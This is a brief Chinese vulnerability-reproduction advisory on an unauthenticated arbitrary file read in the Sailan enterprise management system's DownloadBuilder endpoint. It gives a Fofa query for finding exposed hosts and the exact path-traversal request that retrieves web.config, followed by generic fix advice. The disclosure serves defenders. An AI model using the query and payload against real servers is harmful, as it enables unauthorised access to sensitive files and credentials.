漏洞描述
赛蓝企业管理系统 DownloadBuilder 接口存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
网络空间测绘
Fofa
body="www.cailsoft.com" || body="赛蓝企业管理系统"
漏洞复现
/BaseModule/ReportManage/DownloadBuilder?filename=/../web.config
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、用防火墙等安全设备设定访问规则,只允许白名单中的设备访问。
3、及时升级产品到最新版本。
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论